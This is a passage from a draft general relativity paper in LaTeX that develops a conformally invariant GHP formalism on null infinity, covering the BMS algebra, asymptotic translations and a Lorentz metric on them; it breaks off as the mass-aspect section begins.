remains unchanged. This is the ``universal structure tensor'' as defined by Geroch~\cite{Geroch:1977}. It is closely related to the ``strong conformal geometry'' defined by Penrose~\cite{Penrose:1986} which is essentially the ``square root'' of the tensor. Its relevance becomes clearer when one considers a generator of $\mathscr{I}$ with tangent vector $N^a$ and associated parameter $u$ defined by $\mathrm{d} u(N)=1$. The parameter is called the Bondi time and it measures the retarded time along that generator. Under a change of conformal factor it changes according to $\mathrm{d} u \mapsto \mathrm{d} \hat{u} = \Theta \mathrm{d} u$. At the same time, the length $\mathrm{d} l(v)=\sqrt{-g_{ab}v^av^b}$ of any vector $v^a$ tangent to a cut through the generator changes by the same factor $\Theta$ so that the ratio $\mathrm{d} l:\mathrm{d} u$ is unchanged. This is a remnant of the fact that, in relativity, space and time intervals do not have independent meaning. The spatial and temporal scales are tied together by the constant speed of light. At every point outside of $\mathscr{I}$ this is encoded in the Lorentzian signature of the metric. But restricted to $\mathscr{I}$ where the metric is degenerate this fundamental fact of Einstein's theory is still maintained in the form of this ratio and its conformal invariance.
Having set up the null tetrad we are now in a position to discuss the implications for the spin-coefficients on $\mathscr{I}$. The first obvious consequences follow from the fact that $\mathscr{I}$ is a null hypersurface: it is generated by a null geodetic congruence tangent to $n^a$ so that on $\mathscr{I}$ the equations $\kappa'=0$ and $\bar\rho' = \rho'$ must hold.The fact that we aligned $m^a$ with the 2-surfaces of constant $s$ implies that also $\bar\rho=\rho$ on $\mathscr{I}$. More information can be gleaned from the asymptotic Einstein condition~\eqref{eq:4} which after inserting $\nabla_a\Omega = -A n_a + \Omega X_a$ can be rewritten as
\[
\nabla_a A n_b + A \nabla_a n_b - A n_a X_b = g_{ab} X + \Omega X_{ab}
\]
where the fields $X$, $X_a$ and $X_{ab}=X_{ba}$ are some irrelevant smooth fields on $M$. Taking components and evaluating the combinations which are free of any $X$ fields on $\mathscr{I}$ yields the equations
\[
\begin{gathered}
\kappa' = 0, \qquad \sigma'=0,\qquad \bar\rho' = \rho',\\
\thorn' A + \rho' A = 0 , \qquad \eth A = 0.
\end{gathered}
\]
The next set of equations comes from the curvature equations which relate the curvature to derivatives of the spin-coefficients. Those equations which are intrinsic to $\mathscr{I}$ are
\begin{align}
\label{eq:7}
\thorn' \rho' - \rho'^2 &= \Phi_{22}, \\
\label{eq:8}
\etp\rho' &= \Phi_{21}, \\
\label{eq:9}
\eth\rho - \etp \sigma &= \Phi_{01}, \\
\label{eq:10}
\thorn' \sigma - \rho' \sigma - \eth\tau + \tau^2 &= -\Phi_{02}, \\
\label{eq:11}
\thorn'\rho - \rho\rho' + 2 \Lambda &= \etp\tau - \tau{\bar\tau}.
\end{align}
Note, that a consequence of~\eqref{eq:11} is that
\[
\etp\tau = \eth {\bar\tau}.
\]
The commutators between the three operators also contain information about the spin-coefficients. Restricted to $\mathscr{I}$ they are when acting on a GHP scalar with weights $(p,q)$
\begin{align}
\thorn'\eth - \eth\thorn' &= \rho'\eth - \tau \thorn' - p (\rho'\tau - \Phi_{12}),\label{eq:12}\\
\thorn'\etp - \etp\thorn' &= \rho'\etp - {\bar\tau} \thorn' - q (\rho'{\bar\tau} - \Phi_{21}),\label{eq:13}\\
\eth\etp - \etp\eth &= - (p - q) K,\label{eq:14}
\end{align}
where $K=\Phi_{11} + \Lambda -\rho\rho' = \bar{K}$ is the remnant of the complex curvature on $\mathscr{I}$, where in fact it is real.
Finally, we need the relevant Bianchi identities. The Bianchi identity for the physical space-time yields an equation for the rescaled Weyl spinor components $\psi_i$ in terms of the spin-coefficients which looks superficially like a zero-rest-mass field equation for a spin-2 field. The Bianchi identity for the conformal space-time lead to equations for the Ricci components in terms of the Weyl scalars. Explicitly, the relevant equations intrinsic to $\mathscr{I}$ are
\begin{itemize}[wide]
\item the intrinsic propagation equations along $\mathscr{I}$ for $\psi_{ABCD}$
\begin{align}
\thorn' \psi_0 - \rho' \psi_0 - \eth \psi_1 + 4 \tau \psi_1 &= 3 \sigma \psi_2,\label{eq:15}\\
\thorn' \psi_1 - 2\rho' \psi_1 - \eth \psi_2 + 3 \tau \psi_2 &= 2 \sigma \psi_3,\label{eq:16}\\
\thorn' \psi_2 - 3\rho' \psi_2 - \eth \psi_3 + 2 \tau \psi_3 &= \sigma \psi_4,\label{eq:17}\\
\thorn' \psi_3 - 4\rho' \psi_3 - \eth \psi_4 + \tau \psi_4 &= 0\label{eq:18},
\end{align}
\item and the intrinsic propagation equations along $\mathscr{I}$ for the Ricci components in terms of the $\psi$'s
\begin{align}
\thorn' \Phi_{00} - \etp \Phi_{01} + 2 \mbox{\th} \Lambda &= -2 \tau \Phi_{10} - 2 {\bar\tau} \Phi_{01} + \rho' \Phi_{00} + {\bar\sigma} \Phi_{02} + 2 \rho \Phi_{11} + A \psi_2, \label{eq:19}\\
\thorn' \Phi_{01} - \etp \Phi_{02} + 2 \eth\Lambda &= - 2\tau \Phi_{11} - {\bar\tau} \Phi_{02} + 2\rho' \Phi_{01} + 2 \rho \Phi_{12} ,\label{eq:20}\\
\thorn' \Phi_{01} - \eth \Phi_{11} + \eth\Lambda &= -2 \tau \Phi_{11} - {\bar\tau} \Phi_{02} + \rho' \Phi_{01} + \sigma \Phi_{21} + \rho \Phi_{12} + A {\bar\psi}_3,\label{eq:21}\\
\thorn' \Phi_{11} - \etp \Phi_{12} + \thorn'\Lambda &= - {\bar\tau} \Phi_{12} - \tau \Phi_{21} + 2 \rho' \Phi_{11} + \rho \Phi_{22} ,\label{eq:22}\\
\thorn' \Phi_{20} - \etp \Phi_{21} &= -2 {\bar\tau} \Phi_{21} + \rho' \Phi_{20} + {\bar\sigma} \Phi_{22} + A \psi_4,\label{eq:23}\\
\thorn' \Phi_{21} - \etp \Phi_{22} &= - {\bar\tau} \Phi_{22} + 2 \rho' \Phi_{21} .\label{eq:24}
\end{align}
\end{itemize}
There are no equations for $\thorn'\psi_4$ and $\thorn'\Phi_{22}$. Strictly speaking,~\eqref{eq:19} is not intrinsic since it contains $\mbox{\th}\Lambda$. However, it is a complex equation and its imaginary part is intrinsic. Furthermore, we have two equations for $\thorn'\Phi_{01}$ which could be combined into a ``propagation equation'' and a ``constraint equation''.
Since we have values for all the Ricci components except $\Phi_{00}$ and $\Phi_{11}$ we would expect that all equations which contain only those known components will give us relation between the remaining spin-coefficients or are satisfied identically. For instance, ~\eqref{eq:24} is easily seen to be an identity once we insert the values on $\mathscr{I}$.
We will come back to these equations after we have developed some more background.
\section{The conformal GHP formalism}
\label{sec:conf-ghp-form}
Since the existence of $\mathscr{I}$ is due to the conformal compactification of a physical space-time with a conformal factor that is fixed only up to the multiplication with a positive function the entire physical content on $\mathscr{I}$ must be invariant under conformal rescalings. This property is usually exploited by choosing a conformal gauge, i.e., by fixing the conformal factor so that calculations simplify. We will proceed here in a different way and maintain the conformal invariance in all our operations. To this end we need to introduce conformally weighted quantities and conformally invariant derivative operators (see~\cite{Penrose:1984a}).
We call $\eta$ a \emph{conformal density of weight} $w$ if it changes under the change $\Omega\mapsto\Omega \Theta$ by $\eta \mapsto \Theta^w \eta$. Since we are using the GHP formalism which partially implements a frame invariance such quantities $\eta$ will in general also be GHP weighted. We denote the weights of a conformally weighted GHP quantity $\eta$ in the form $[w;p,q]$. In order to incorporate the conformal invariance within the GHP formalism one needs to decide about how the null tetrad transforms under conformal rescaling. Here, the most natural choice is to map
\[
l^a \mapsto \Theta^{-2}l^a,\qquad
m^a \mapsto \Theta^{-1}m^a,\qquad
n^a \mapsto n^a.
\]
Even for a conformal density $\eta$ the derivatives $\thorn' \eta$ and $\eth \eta$ will not be conformal densities. Instead we find for $\eta$ of weights $[w;p,q]$ that
\[
\begin{aligned}
\thorn' \eta &\mapsto \Theta^w(\thorn' \eta + (w+p+q) D'\theta \, \eta), \\
\eth \eta &\mapsto \Theta^{w-1}(\eth \eta + (w+q) \delta\theta \, \eta), \\
\etp \eta &\mapsto \Theta^{w-1}(\etp \eta + (w+p) \delta'\theta \, \eta).
\end{aligned}
\]
where we have defined $\theta = \log\Theta$. In order to obtain conformal densities one needs to eliminate the derivatives of $\theta$. To this end one uses the inhomogeneous transformation of some of the spin-coefficients, in this case of $\tau$ and $\rho'$ which transform according to
\[
\tau \mapsto \Theta^{-1}(\tau - \delta \theta), \quad \rho' \mapsto \rho' - D'\theta.
\]
Combining these two inhomogeneous behaviours leads to the introduction of the conformally invariant GHP operators acting on a quantity $\eta:[w;p,q]$
\begin{align}
{\thorp_c} \eta &= \thorn' \eta + (w + p + q)\rho' \eta,\label{eq:25}\\
\ethc \eta &= \eth \eta + (w + q)\tau \eta,\label{eq:26}\\
\etbc \eta &= \etp \eta + (w + p){\bar\tau} \eta.\label{eq:27}
\end{align}
Note, that in the context of $\mathscr{I}$ there is no need to consider $\mbox{\th}_c$ since it is an outward derivative. Similarly, we do not need the conformal $\etp_c$ operator. This would be defined in terms of $\tau'$ which is also an extrinsic quantity, being defined in terms of the parallel transport of $n^a$ along $l^a$ away from $\mathscr{I}$. Thus, the two derivatives transverse to the generators but tangent to $\mathscr{I}$ are represented by $\ethc$ and its complex conjugate $\etbc$, \emph{which is not the same as $\etp_c$}.
For $\eta$ a conformal density of weight $w$ the derivatives have weights
\[
{\thorp_c}\eta : [w;p-1,q-1], \quad
\ethc\eta : [w-1;p+1,q-1], \quad
\etbc\eta : [w-1;p-1,q+1].
\]
Next, we need the commutators among these operators. Some calculation yields the rather simple result which holds on $\mathscr{I}$ (i.e., with $\sigma' = 0 = \kappa' = \rho' - {\bar\rho}'$)
\begin{align}
[{\thorp_c},\ethc]\eta &= (w + q) \mathcal{P} \eta, \label{eq:28}\\
[{\thorp_c},\etbc]\eta &= (w + p) \overline{\cP} \eta, \label{eq:29}\\
[\ethc,\etbc]\eta &= -(p-q) \mathcal{Q} \eta. \label{eq:30}
\end{align}
The commutators define the \emph{quantities}
\begin{equation}
\mathcal{P} := \thorn'\tau - \eth\rho', \qquad \mathcal{Q} := K - \etp\tau = \overline{\cQ},\label{eq:31}
\end{equation}
which are conformal densities $\mathcal{P}:[-1;0,-2]$, $\overline{\cP}:[-1;-2,0]$ and $\mathcal{Q}:[-2;0,0]$. Recall that on $\mathscr{I}$ both $K$ and $\etp\tau$ are real. While they are not conformally invariant individually, their combination is. Similarly, the individual terms defining $\mathcal{P}$ are not conformally invariant but their combination is a conformal density. This can be checked explicitly by going through the individual transformations.
Finally, we evaluate the Jacobi identity for these operators in order to get equations between these commutator quantities. There is only one non-trivial combination to consider, namely
\[
[{\thorp_c},[\ethc ,\etbc]] + [\ethc,[\etbc ,{\thorp_c}]] + [\etbc,[{\thorp_c} ,\ethc]] = 0.
\]
Evaluating the three terms acting on an arbitrary conformal density $\eta:[w;p,q]$ yields
\[
(w+q)\left[\etbc\mathcal{P} + {\thorp_c}\mathcal{Q}\right] - (w+p) \left[\ethc \overline{\cP} + {\thorp_c}\mathcal{Q}\right] = 0.
\]
Since this holds for all $\eta$, i.e., for all weights, we get the equations
\begin{equation}
\label{eq:32}
{\thorp_c}\mathcal{Q} + \etbc\mathcal{P} = 0, \qquad {\thorp_c}\mathcal{Q} + \ethc \overline{\cP} = 0
\end{equation}
with the consequence that $\ethc \overline{\cP} = \etbc\mathcal{P}$.
Returning now to the equations which are implied on $\mathscr{I}$. It is easily verified that $\sigma$ is a conformal density with weight $[-2;3,-1]$. Also, the factor $A$ is a conformal density with weights $A:[-1;1,1]$ satisfying the equations
\[
{\thorp_c} A = 0, \qquad \ethc A = 0
\]
on $\mathscr{I}$.
The components of the rescaled Weyl tensor are all conformal densities with weights
\[
\psi_k : [k-5;4-2k,0]
\]
and the equations relating them can be written in terms of the conformal derivative operators as
\begin{equation}
{\thorp_c} \psi_k - \ethc \psi_{k+1} = (3-k) \sigma \psi_{k+2}, \qquad k=0:3.\label{eq:33}
\end{equation}
The Ricci components are not immediately conformal densities and their equations can not be simply rewritten in a conformally invariant form. However, some of them correspond to equations just derived. Consider for instance~\eqref{eq:22}. Inserting the values for the Ricci components from (\ref{eq:7}--\ref{eq:10}) $\Phi$'s yields
\[
\begin{multlined}
\thorn' \Phi_{11} + \thorn'\Lambda - 2 \rho' \Phi_{11} = \etp \eth\rho' - {\bar\tau} \eth\rho' - \tau \etp\rho' + \rho \thorn'\rho' - \rho\rho'^2 \\
= \etp \eth\rho' - {\bar\tau} \eth\rho' - \tau \etp\rho' + \thorn'(\rho \rho') -\rho'\etp\tau + \rho'\tau{\bar\tau} + 2 \rho'\Lambda - 2 \rho\rho'^2
\end{multlined}
\]
which can be rewritten in the form
\[
\thorn' (\Phi_{11} + \Lambda -\rho\rho') - 2 \rho' (\Phi_{11} + \Lambda - \rho\rho') = \etp \eth\rho' - {\bar\tau} \eth\rho' - \tau \etp\rho' - \rho'\etp\tau + \rho'\tau{\bar\tau}.
\]
Adding the terms $\thorn'\etp\tau - 2\rho'\etp\tau$ on both sides and using the $[\thorn',\etp]$ commutator yields the second equation in~\eqref{eq:32}.
\section{Cut systems of null infinity}
\label{sec:cut-systems-null}
It is clear from what was discussed so far that the only non-trivial GHP spin-coefficients on $\mathscr{I}$ are $\rho$, $\sigma$, $\rho'$ and $\tau$. The first two give information which is extrinsic to $\mathscr{I}$ in the sense that they tell us about the shape of the outgoing null hypersurfaces intersecting $\mathscr{I}$ in the cuts of constant $s$. The role of $\sigma$ is closely tied to the gravitational radiation which arrives at infinity. While $\rho$ and $\sigma$ describe dynamical properties, the other two spin-coefficients, $\rho'$ and $\tau$ are intrinsic to $\mathscr{I}$ and describe its non-dynamical, kinematical, structure. Clearly, $\rho'$ determines the conformal gauge in the sense that given its value on $\mathscr{I}$ one can recreate the conformal factor $\Theta$ from its value at a single cross-section by solving the equation ${\thorp_c}\Theta=0$. But, what is the meaning of $\tau$?
Recall our assumption that there exists a function $s$ on $\mathscr{I}$ such that its level surfaces are regular cross-sections of $\mathscr{I}$ and that the frame is adapted to the cuts so that $\delta s = 0$. We take $s$ to be a scalar, i.e., having weights $[0;0,0]$ and consider the commutator
\[
[\thorn',\eth]s = \thorn'\eth s - \eth\thorn' s = \rho' \eth s - \tau \thorn' s
\]
which implies that $\tau = \eth\thorn' s/\thorn' s$. Since $\eth A=0$ we can just as well write $\tau = \eth(A\thorn' s)/(A\thorn' s)$. The quantity $A\thorn' s = N^a\nabla_as = \mathrm{d} s/\mathrm{d} u$ is therefore the change of $s$ along the null generators with respect to the Bondi time $u$ which is distinguished by the conformal gauge in operation. It turns out that the more natural quantity to use is the reciprocal $\alpha = \mathrm{d} u/\mathrm{d} s$. Since $\mathrm{d} u = \alpha \mathrm{d} s$ we may call it the \emph{null lapse}, relating the two notions of time along the null generators. Then $\tau$ describes the change in the passage of Bondi time between two different $s$-cuts, $\tau=0$ indicating that the changes in $u$ and $s$ are proportional across a cut.
The null lapse $\alpha$ is a conformal density with weights $[1;0,0]$ and it satisfies the equation $\ethc\alpha = \eth \alpha + \tau \alpha = 0$. Consider now the commutator
\[
{\thorp_c}\ethc \alpha - \ethc{\thorp_c} \alpha = - \ethc {\thorp_c} \alpha = \mathcal{P} \alpha.
\]
This equation determines $\mathcal{P}$ in terms of the chosen system of cuts
\begin{equation}
\label{eq:34}
\mathcal{P} = - \ethc ({\thorp_c} \alpha/\alpha).
\end{equation}
The other quantity $\mathcal{Q} = K - \etp\tau$ is mostly determined by the geometry of the cuts since $K$ here is real and therefore equals one half of the Gauß curvature of the cuts. The conformal correction $\etp\tau$ is achieved with information about the cut system.
The vanishing of $\mathcal{P}$ is the integrability condition for the simultaneous equations $\rho' = \thorn' \theta$ and $\tau = \eth\theta$. Thus, when $\mathcal{P}=0$ we can find a conformal factor $\Theta$ such that both $\rho'$ and $\tau$ vanish after a conformal rescaling. If $\mathcal{P}$ does not vanish, then only one of those quantities can be made to vanish. This is usually taken to be the convergence $\rho'$ whose vanishing indicates that the metrics induced on the cuts all agree. The remaining non-vanishing of $\tau$ then implies that the chosen cuts are not Bondi cuts, i.e., do not belong to a Bondi system.
In the remainder of the paper we will occasionally refer to two special gauges. The first is what we call the \emph{cylinder gauge} which is characterised by the vanishing of $\rho'$ and choosing the unit-sphere metric as the common metric of the $s$-cuts, so that $K=\frac12$ is constant. The other gauge that we use is a Bondi system which makes the additional assumption that $\tau=0$, i.e., that the null lapse is constant across a cut.
\section{The BMS algebra}
\label{sec:bms-algebra}
An important role in the discussion of the structure of $\mathscr{I}$ is played by its invariance group, the so called BMS group. This is the group of diffeomorphisms of $\mathscr{I}$ which leave the universal structure tensor~\eqref{eq:6} invariant. Here, we determine its algebra, i.e., the Lie algebra $\mathscr{B}$ of infinitesimal BMS generators as the vector fields $X^a$ on $\mathscr{I}$ for which
\[
\Lie{X}{\Gamma_{ab}{}^{cd}} = 0.
\]
We write a general vector field $X^a$ as a linear combination of the tetrad vectors tangent to $\mathscr{I}$
\[
X^a = \eta n^a + {\bar\xi} m^a + \xi \overline{m}^a,
\]
where $\eta$ and $\xi$ are conformal densities $\eta:[0;1,1]$ and $\xi:[1;1,-1]$.
A short calculation yields the expressions
\begin{equation}
\label{eq:35}
\begin{aligned}
\Lie{X}{g_{ab}} &= - g_{ab} \left( \etp \xi + \eth {\bar\xi} - 2\rho'\eta \right) - 2 \overline{m}_a \overline{m}_b\eth \xi - 2 m_a m_b\etp {\bar\xi} \\
&\qquad\qquad+ 2l_{(a}\overline{m}_{b)} \left(\thorn' \xi + \rho' \xi \right) + 2l_{(a}m_{b)} \left(\thorn' {\bar\xi} + \rho' {\bar\xi} \right) ,\\
\Lie{X}{N^a} &= \left( \eta \thorn' A - A \thorn' \eta + A \tau {\bar\xi} + A {\bar\tau} \xi \right) n^a - A \left( \thorn' {\bar\xi} + \rho' {\bar\xi} \right) m^a - A \left( \thorn' \xi + \rho' \xi \right) \overline{m}^a.
\end{aligned}
\end{equation}
The invariance of $\Gamma_{ab}{}^{cd}$ implies that
\[
\Lie{X}{g_{ab}} N^c + 2 g_{ab} \,\Lie{X}{N^c} = 0.
\]
Thus, $\Lie{X}{g_{ab}} \propto g_{ab}$ and $\Lie{X}{N^a} \propto N^a$ so that the off diagonal terms in $\Lie{X}{g_{ab}}$ must vanish as do the terms in $\Lie{X}{N^a}$ not proportional to $n^a$. This means that we get the equations
\[
\thorn' \xi + \rho' \xi = 0, \qquad \eth\xi = 0
\]
together with
\[
A\etp \xi + A\eth {\bar\xi} - 2\rho'\eta + 2 (\eta \thorn' A - A \thorn' \eta + A \tau {\bar\xi} + A {\bar\tau} \xi ) = 0.
\]
Taken together we find that a BMS generator $X^a$ is represented by a pair of two conformal densities $X=(\xi,\eta_\xi)$ subject to the equations
\begin{equation}
\label{eq:36}
\ethc\xi = 0, \qquad {\thorp_c}\xi = 0, \qquad {\thorp_c}\eta_\xi = \frac12\left( \etbc\xi + \ethc{\bar\xi}\right).
\end{equation}
Using these equations the commutator between two BMS generators $X$ and $X'$ becomes
\begin{equation}
[(\xi,\eta),(\xi',\eta')] = \left(\xi\diamond \etbc\xi, \frac12\eta\diamond \etbc\xi + \frac12\eta\diamond \ethc{\bar\xi} + \xi\diamond\etbc\eta + {\bar\xi}\diamond\ethc\eta \right)\label{eq:37}
\end{equation}
where $\alpha\diamond\beta = \alpha \beta' - \beta \alpha'$.
It is straightforward to verify that generators of the form $(0,\eta)$ (for which ${\thorp_c}\eta=0$) form a sub-algebra which is in fact an Abelian ideal $\mathscr{S}$, since $[\mathscr{B},\mathscr{S}] \subset \mathscr{S}$. The elements of $\mathscr{S}$ are called (infinitesimal) super-translations. They are represented here as conformal densities $\eta$ on $\mathscr{I}$ satisfying ${\thorp_c}\eta=0$, thus corresponding to global functions on the sphere of null generators of $\mathscr{I}$.
On the other hand, given any cut of $\mathscr{I}$ the Lie algebra of its isotropy group can be given as $(\xi,\eta_\xi)$ where $\eta_\xi$ vanishes on the cut. Each of these algebras is isomorphic to the Lie algebra $\mathfrak{so}(1,3)$ of infinitesimal Lorentz transformations, a real form of $\mathfrak{sl}(2,{\mathbb{C}})$ (see app.~\ref{sec:asympt-symm-1}). \jf{Say something about only considering the complex form} However, there is no distinguished unique sub-algebra of $\mathscr{B}$, isomorphic to the Lorentz generators.
Sachs~\cite{Sachs:1962b} has shown that the infinite dimensional ideal of super-translations contains a 4-dimensional sub-ideal $\mathscr{T}$, the (infinitesimal) translations. In the present context we can obtain this ideal by observing that $\mathscr{T}$ must be invariant under the adjoint action of $\mathscr{B}$ on $\mathscr{S}$. A generator $(\xi,\eta_\xi)\in\mathscr{B}$ acts on $(0,\eta)$ according to the adjoint action $(0,\eta)\mapsto (0,\ad_\xi\eta):=[(\xi,\eta_\xi),(0,\eta)]$ (in a blatant abuse of notation) where
\[
\ad_\xi\eta = \xi\etbc\eta - \frac12\eta\etbc\xi.
\]
A closer look reveals (see app.~\ref{sec:asympt-symm-1}) that $\mathscr{T}\subset\mathscr{S}$ is spanned by eigenvectors of $\ad_{\xi_0}$ for some generator $\xi_0$, i.e., conformal densities satisfying\jf{Mention reality condition and spin-1/2 representation}
\begin{equation}
\xi_0\etbc\eta - \frac12\eta\etbc\xi_0 = \lambda_0 \eta,\label{eq:38}
\end{equation}
where $\lambda_0=\pm\frac12$. This characterisation of the space of asymptotic translations is not very convenient since it makes reference to the Lorentz part $\xi$ of generators. It is possible to give another characterisation of $\mathscr{T}$ which is much more useful.
\begin{thm}
Let $R$ be the conformal density for which
\begin{equation}
\etbcR+\ethc\mathcal{Q}=0,\label{eq:39}
\end{equation}
and let $U$ be a conformal density with weights $[1;0,0]$ then
\begin{equation}
\ethc[2]U = R U,\label{eq:40}
\end{equation}
if and only if $\eta=A U\in \mathscr{T}$.
\end{thm}
\begin{proof}[Proof]
Every $\eta\in\mathscr{T}$ is a linear combination of eigenfunctions of the operator $\ad_{\xi_0}$ defined by the left hand side in~\eqref{eq:38}. It is enough to focus only on those. Thus, we assume that $\eta$ satisfies \eqref{eq:38} with $\lambda=\pm\frac12$. Applying $\eth_c^2$ to this equation and using the commutator relations between $\ethc$ and $\etbc$ yields
\begin{equation}
\label{eq:41}
\xi_0\etbc\ethc[2]\eta - \frac12\ethc[2]\eta\etbc\xi_0 = \lambda_0 \ethc[2]\eta + \xi_0\ethc\mathcal{Q}\eta.
\end{equation}
Since $\etbc A = 0$, the conformal density $U=A\eta$ satisfies the same equation. Defining $Z:=\ethc[2]U-R U$ and inserting into~\eqref{eq:41} yields
\[
\xi_0\etbc Z - \frac12 Z\etbc\xi_0 = \lambda_0 Z + \xi_0\ethc\mathcal{Q} U + \xi_0\etbcR U.
\]
Since $R$ satisfies~\eqref{eq:39} this shows that $Z$ satisfies~\eqref{eq:38} as well. Referring to app.~\ref{sec:equat-co-curv} and noting that $Z$ has spin-weight $s=2$ implies that $Z=0$ identically. Thus, $\eta\mapsto A\eta$ defines a linear map from $\mathscr{T}$ to the solution space of~\eqref{eq:40} which is injective. Since both spaces are 4-dimensional this establishes the result.
\end{proof}
Note, that in view of this result we will henceforth identify $\mathscr{T}$ with the solution space of~\eqref{eq:40}, i.e., an asymptotic translation is a conformal density $U:[1;0,0]$ satisfying~\eqref{eq:40}.
The conformal density $R$ introduced above is closely related to the ``gauge field'' $\rho_{ab}$ defined by Geroch~\cite{Geroch:1977}. As shown in app.~\ref{sec:equat-co-curv} it is uniquely determined by the equation $\etbcR+\ethc\mathcal{Q}=0$. In view of this equation and in lack of a better name we call the field $R$ the \emph{co-curvature}. This equation also fixes the behaviour of the co-curvature along the null generators as follows from the Jacobi identity~\eqref{eq:32} and
\[
\begin{multlined}
0 = {\thorp_c}(\etbcR + \ethc\mathcal{Q}) = \etbc{\thorp_c}R + 2 \mathcal{P} \mathcal{Q} + \ethc {\thorp_c}\mathcal{Q}\\ = \etbc{\thorp_c}R + 2 \mathcal{P} \mathcal{Q} - \ethc \etbc\mathcal{P} = \etbc({\thorp_c}R - \ethc\mathcal{P}).
\end{multlined}
\]
Since $\etbc$ acting on densities with weight $[-2;1,-3]$ is an isomorphism (see app.~\ref{sec:equat-co-curv}) we find
\begin{equation}
\label{eq:42}
{\thorp_c}R = \ethc\mathcal{P}.
\end{equation}
\section{The Lorentz metric on the space of translations}
\label{sec:lorentz-metric-space}
Our next problem is to define a metric on $\mathscr{T}$. This is necessary for several reasons, the most important one being that the energy-momentum is commonly defined as a co-vector on $\mathscr{T}$ and it is interpreted as a Lorentzian 4-vector. This implies that there is Lorentzian metric on $\mathscr{T}^*$, the dual space to $\mathscr{T}$ and hence also on $\mathscr{T}$. Furthermore, it is important to normalise the translations in order to fix the magnitudes of the computed energies and momenta.
A discussion of this issue is difficult to find in the literature since in the Bondi gauge the first four spherical harmonics are implicitly taken as an orthonormal Lorentzian basis for $\mathscr{T}$ with respect to which the energy-momentum vector can be computed. This is consistent with spinorial approaches to the Bondi energy-momentum based on the Nester-Witten form (see~\cite{Horowitz:1982,Szabados:2009}) where the structure of spin-space is used to define a Lorentzian metric on $\mathscr{T}$. However, at least to our knowledge there is no explicit definition of a Lorentzian metric on $\mathscr{T}$ defined as the solution space of~\eqref{eq:40}.
A hint about how to proceed in the general case can be found in a paper by Hansen, Janis et al~\cite{Hansen:1976} where a representation of a Minkowski vector at a point $P$ as a function on the light cone of $P$ is discussed. Given a vector $U^a$ at $P$, the authors associate a scalar $U = U^al_a$ to every null vector $l^a$ at $P$ with $t^al_a=1$, where $t^a$ is a future-pointing time-like unit-vector, the first member of an orthonormal basis at~$P$. This defines a function $U$ on the unit-sphere of null vectors $l^a$ at $P$ which automatically satisfies the equation $\eth^2U=0$. For any two vectors $U^a$ and $V^a$ at $P$ and their representative functions $U$ and $V$ on the sphere one can define\footnote{Note, that the conventions regarding $\eth$ in~\cite{Hansen:1976} are different from the ones used here.}
\begin{equation}
G[U,V] = UV + U \eth\etp V + V \eth\etp U - \eth U \etp V - \eth V \etp U\label{eq:43}
\end{equation}
and, remarkably, one finds that $G[U,V]=U_aV^a$, i.e., the expression $G[U,V]$ is constant on the sphere and evaluates to the inner product between the two vectors.
Taking this expression as a starting point we consider now a more general sphere $\mathcal{S}$ in Minkowski space and two functions $U$ and $V$ on it. We first assume the sphere to have a constant radius $R$. Then we find that for dimensional reasons we should consider the expression
\[
G[U,V] = \frac1{R^2} UV + U \eth\etp V + V \eth\etp U - \eth U \etp V - \eth V \etp U.
\]
Applying $\eth$ to this equation and using the commutator equation $[\eth,\etp]\alpha = -sR^{-2} \alpha$ for any quantity $\alpha$ with spin-weight $s$ on a sphere of radius $R$ we obtain
\[
\eth G[U,V] = - \eth^2 U\, \etp V - \eth^2 V\, \etp U,
\]
showing that $G[U,V]$ is constant on $\mathcal{S}$ if and only if $U$ and $V$ satisfy the equation $\eth^2U=0=\eth^2V$.
Next, we consider the general case. Again, we need to make adjustments to the formula. This time, it is natural to replace the $R^{-2}$-term with the Gauß curvature of the sphere and in view of the conformal invariance we use the conformal density $\mathcal{Q}$. Furthermore, we consider the quadratic form $q[U]:=G[U,U]$ since the bilinear form can be obtained by polarisation and we use the general conformally invariant derivatives. This puts our focus onto the quadratic expression (and its associated bilinear form $G[U,V]$)
\begin{equation}
\label{eq:44}
q[U] = 2\mathcal{Q} U^2 + 2U \ethc\etbc U - 2\ethc U \etbc U
\end{equation}
defined in terms of a scalar $U$ on $\mathscr{I}$. First, we note that this expression is a conformal density and if $U$ has weights $U:[1;0,0]$ then $q[U]$ is a scalar, i.e., all its weights vanish. Furthermore, a short calculation shows that
\[
\ethc q[U] = 2\etbc\left( U \left[\ethc[2]U - R U\right]\right).
\]
In a similar way we compute
\[
{\thorp_c} q[U] = 2G[{\thorp_c} U,U]
\]
This shows that $q[U]$ is constant on a $s$-cut if and only if $\ethc[2]U = R U$, since $\etbc \eta=0$ has only the trivial solution for $\eta$ with weights $[0;2,-2]$\jf{Mention this in the appendix.}. Since $q[U]$ is conformally invariant we can evaluate it in any gauge. Doing this in a Bondi system reduces $q[U]$ to $G[U,U]$ with $G$ as given in~\eqref{eq:43} on any Bondi cut. Since this is a non-degenerate bilinear form, we find that ${\thorp_c} q[U] = 0$ if and only if ${\thorp_c} U=0$. Thus, we have shown that $q[U]$ is constant on $\mathscr{I}$ if and only if $U\in\mathscr{T}$, so that $q[U]$ is a quadratic form with Lorentzian signature on $\mathscr{T}$ which we take as the definition of the Lorentz metric on the space $\mathscr{T}$ of asymptotic translations.
When rewriting the quadratic form with respect to the usual $\eth$ and $\etp$-operators we obtain
\begin{equation}
q[U] = 2K U^2 + 2 U \eth\etp U - 2 \eth U \etp U.\label{eq:45}
\end{equation}
Now recall that $K=\frac12 k[g]$, where $k[g]$ is the Gauß curvature of the induced metric $g_{ab}$ on the cut through the point where $q[U]$ is evaluated and that the Gauß curvature transforms under a conformal rescaling $g_{ab} \mapsto \Theta^2 g_{ab}$\jf{Should one use a different symbol for the 2-metric?} as follows
\[
k[\Theta^2g] = \Theta^{-2}\left(k[g] - 2\Theta\, \eth\etp \Theta + 2\eth\Theta\, \etp\Theta \right).
\]
Rewriting this in terms of $K$ we get the equation
\begin{equation}
\label{eq:46}
\Theta^2K[\Theta^2g] + \Theta\, \eth\etp \Theta - \eth\Theta\, \etp\Theta = K[g] .
\end{equation}
Suppose now that $U$ does not vanish anywhere, then we can replace $g$ with $U^{-2}g$ and, comparing with \eqref{eq:45}, we find
\begin{equation}
q[U] = 2 (U^2K[g] + U\, \eth\etp U - \eth U\, \etp U) = 2 K[U^{-2}g].\label{eq:47}
\end{equation}
Therefore, we find that $q[U]=1$, i.e., $U$ is normalised, if and only if $U^{-2}g_{ab}$ has Gauß curvature equal to $1$, i.e., it is the metric on the unit-sphere.
\section{The mass aspect}
\label{sec:mass-aspect}
We are now ready to discuss the main ingredient in the definition of the Bondi energy-momentum, the mass aspect. We take as our starting point the definition given in \cite{Penrose:1986}
\[
